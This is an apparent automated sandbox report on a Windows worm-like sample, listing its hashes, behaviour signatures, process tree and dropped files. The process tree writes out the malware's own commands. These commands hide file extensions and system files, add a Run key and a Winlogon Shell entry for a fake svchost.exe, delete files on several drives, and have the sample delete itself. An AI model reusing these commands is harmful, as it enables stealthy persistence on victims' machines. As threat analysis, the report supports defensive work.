Analysis

  • max time kernel
    141s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/09/2024, 08:35

General

  • Target

    ed374a7b5090cf52c4fde2744351af25_JaffaCakes118.exe

  • Size

    33KB

  • MD5

    ed374a7b5090cf52c4fde2744351af25

  • SHA1

    992c23ed8967383cd11e4112a13d8743e064f0ca

  • SHA256

    70bf1dfd84a384ec3e674fe69a23ea0bdad5152fbc265f176f542448a34eaa07

  • SHA512

    8cfcbf64eea51129db01dcb8a9e947ef30cb666f0d70234bfed09a87dc42427593c022b4baa73787498d7010a8c8eb572c7c526334056388f71386f028146eab

  • SSDEEP

    384:Bpm7IgvOWTJ5DzNMhpj0fS+F+7d9WlvSVrEJtoxRnty9WkHoVnUQcWsM46+gEwVF:7MLnDxMhCfXF+7d9HogFM9XoNUy6JzU

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 30 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry key 1 TTPs 7 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ed374a7b5090cf52c4fde2744351af25_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ed374a7b5090cf52c4fde2744351af25_JaffaCakes118.exe"
    1⤵
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops autorun.inf file
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rd /s /q c:\autorun.inf
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2780
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del /f /q /a c:\*.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2800
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c rd /s /q f:\autorun.inf
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c del /f /q /a f:\*.vbs
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2820
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 181 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDriveTypeAutoRun /t REG_DWORD /d 181 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:1176
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c mkdir C:\Progra~1\WindowsUpdate
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2612
    • C:\Progra~1\WindowsUpdate\svchost.exe
      "C:\Progra~1\WindowsUpdate\svchost.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c rd /s /q c:\autorun.inf
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2028
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c del /f /q /a c:\*.vbs
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2900
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c rd /s /q f:\autorun.inf
        3⤵
        • System Location Discovery: System Language Discovery
        PID:576
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c del /f /q /a f:\*.vbs
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1612
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c del /f /a c:\updateme.exe
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2452
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2660
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
        3⤵
        • Modifies visiblity of hidden/system files in Explorer
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:1128
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden /v Type /t REG_SZ /d checkbox2 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:3052
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden /v Type /t REG_SZ /d checkbox2 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2080
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2172
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 1 /f
        3⤵
        • Modifies visibility of file extensions in Explorer
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:1628
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt /v Type /t REG_SZ /d checkbox2 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1356
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt /v Type /t REG_SZ /d checkbox2 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2056
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\360Safe\scan /v sscantype /t REG_DWORD /d 3 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:280
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\360Safe\scan /v sscantype /t REG_DWORD /d 3 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:944
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v IMJPMIG8.1 /t REG_SZ /d C:\Progra~1\WindowsUpdate\svchost.exe /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:804
      • C:\Windows\SysWOW64\reg.exe
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v IMJPMIG8.1 /t REG_SZ /d C:\Progra~1\WindowsUpdate\svchost.exe /f
        3⤵
        • Adds policy Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:1304
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c @echo Windows Registry Editor Version 5.00>C:\Systom.reg&@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>C:\Systom.reg&@echo "Shell"="Explorer.exe C:\\progra~1\\WindowsUpdate\\svchost.exe" >>C:\Systom.reg&regedit /s C:\Systom.reg&del C:\Systom.reg&exit
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2904
      • C:\Windows\SysWOW64\regedit.exe
        regedit /s C:\Systom.reg
        3⤵
        • Modifies WinLogon for persistence
        • System Location Discovery: System Language Discovery
        • Runs .reg file with regedit
        PID:1372
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ping -n 10 127.1&del ed374a7b5090cf52c4fde2744351af25_JaffaCakes118.exe
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Internet Connection Discovery
      PID:2968
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.1
        3⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:1108

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Systom.reg

    Filesize

    181B

    MD5

    d2f4a513898297d0f0561104a2159b16

    SHA1

    2588e260fbf81513383e2aa3b7e0370cb03893b0

    SHA256

    cee3738620cc092ff32f0de257c17035948ac26d54e60997d266116bdc8a080c

    SHA512

    dabe9634c606da1b94687931c95b7fe44c7f045a2e58f2f2682491c783f917efcefbfc9fd6d57aa81f35953f60554699b5388db0cd865ee7f232646f49de51fd

  • F:\RECPCLER.exe

    Filesize

    33KB

    MD5

    ed374a7b5090cf52c4fde2744351af25

    SHA1

    992c23ed8967383cd11e4112a13d8743e064f0ca

    SHA256

    70bf1dfd84a384ec3e674fe69a23ea0bdad5152fbc265f176f542448a34eaa07

    SHA512

    8cfcbf64eea51129db01dcb8a9e947ef30cb666f0d70234bfed09a87dc42427593c022b4baa73787498d7010a8c8eb572c7c526334056388f71386f028146eab

  • \??\c:\autorun.inf

    Filesize

    146B

    MD5

    a17f39f07dc501f6c85688d4ba6ca925

    SHA1

    2619e79e8cf1bf596c7238379fff3bb1a9380bb2

    SHA256

    dd90591071388267c511a2beae4150bca00bdfd92937bf7c91f1db200121601a

    SHA512

    9862bf798a7afef3563610764feb2966c0bcc15af6a8551518da1f9fef3939cc3a93678aec39483898afc8ef6085ea35947a1dc185d92dff6a2c123d7fef434d

  • memory/2220-0-0x0000000000400000-0x0000000000422000-memory.dmp

    Filesize

    136KB

  • memory/2220-3-0x0000000000580000-0x0000000000589000-memory.dmp

    Filesize

    36KB

  • memory/2220-23-0x0000000003600000-0x0000000003622000-memory.dmp

    Filesize

    136KB

  • memory/2220-31-0x0000000000400000-0x0000000000422000-memory.dmp

    Filesize

    136KB

  • memory/2588-29-0x00000000025A0000-0x00000000025A9000-memory.dmp

    Filesize

    36KB

  • memory/2588-36-0x0000000000400000-0x0000000000422000-memory.dmp

    Filesize

    136KB

  • memory/2588-38-0x00000000025A0000-0x00000000025A9000-memory.dmp

    Filesize

    36KB